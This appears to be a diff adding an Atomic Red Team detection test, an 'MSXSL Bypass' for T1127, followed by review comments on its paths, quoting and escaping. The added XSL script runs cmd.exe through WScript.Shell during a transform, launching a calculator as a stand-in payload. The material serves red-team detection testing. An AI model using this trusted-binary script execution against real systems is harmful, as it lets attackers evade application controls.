diff --git a/atomics/T1127/T1127.yaml b/atomics/T1127/T1127.yaml index 30e3f9b3..143a4617 100644 --- a/atomics/T1127/T1127.yaml +++ b/atomics/T1127/T1127.yaml @@ -16,3 +16,22 @@ atomic_tests: name: command_prompt command: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename} + +- name: MSXSL Bypass + description: | + Executes the code specified within a XSL script tag during XSL transformation. Requires download of MSXSL from Microsoft. + supported_platforms: + - windows + input_arguments: + xmlfile: + description: Location of the test XML file. May be a URL. + type: Path + default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-xmlfile.xml + xslfile: + description: Location of the test XSL script file. May be a URL. + type: Path + default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl + executor: + name: command_prompt + command: | + C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} diff --git a/atomics/T1127/src/msxsl-script.xsl b/atomics/T1127/src/msxsl-script.xsl new file mode 100644 index 00000000..81949e27 --- /dev/null +++ b/atomics/T1127/src/msxsl-script.xsl @@ -0,0 +1,15 @@ + + + + + function xml(nodelist) { +var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\Windows\System32\calc.exe"); + return nodelist.nextNode().xml; + } + + + + \ No newline at end of file diff --git a/atomics/T1127/src/msxsl-xmlfile.xml b/atomics/T1127/src/msxsl-xmlfile.xml new file mode 100644 index 00000000..931e86a8 --- /dev/null +++ b/atomics/T1127/src/msxsl-xmlfile.xml @@ -0,0 +1,7 @@ + + + + +Microsoft + + \ No newline at end of file
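Review bot: The executor command hard-codes `C:\Windows\Temp\msxsl.exe`, while the description only says MSXSL must be downloaded from Microsoft. The test therefore fails unless the binary is staged at that exact path, and it runs whatever file of that name sits in a directory that standard users can typically write to. Exposing the binary location as an input argument would let the operator point at a copy they have verified. `xmlfile` and `xslfile` are declared `type: Path` but described as "May be a URL", and they are substituted unquoted, so a value containing spaces would split into extra arguments. The description could also state the expected result, a calculator process started by the transform, so a failed run is distinguishable from a missed detection.

```yaml
  input_arguments:
    # … unchanged: xmlfile, xslfile …
    msxsl_exe:  # argument name constructed for this note
      description: Location of the msxsl.exe binary downloaded from Microsoft.
      type: Path
      default: C:\Windows\Temp\msxsl.exe
  # … unchanged: executor name …
    command: |
      #{msxsl_exe} "#{xmlfile}" "#{xslfile}"
```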
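Review bot: The string passed to `Run` inside `xml(nodelist)` in `msxsl-script.xsl` uses single backslashes. The script element is not visible on this page, but the `ActiveXObject` call suggests it declares JScript, where `\W`, `\S` and `\c` are not recognised escapes and the backslash is dropped. The command would then become `cmd.exe /c C:WindowsSystem32calc.exe`, so the test probably starts nothing and reports a silent false negative to anyone validating detections with it. Doubling the backslashes keeps the path intact: `new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\\Windows\\System32\\calc.exe");`, and the unused `var r =` can be dropped. Both this file and `msxsl-xmlfile.xml` also end without a trailing newline.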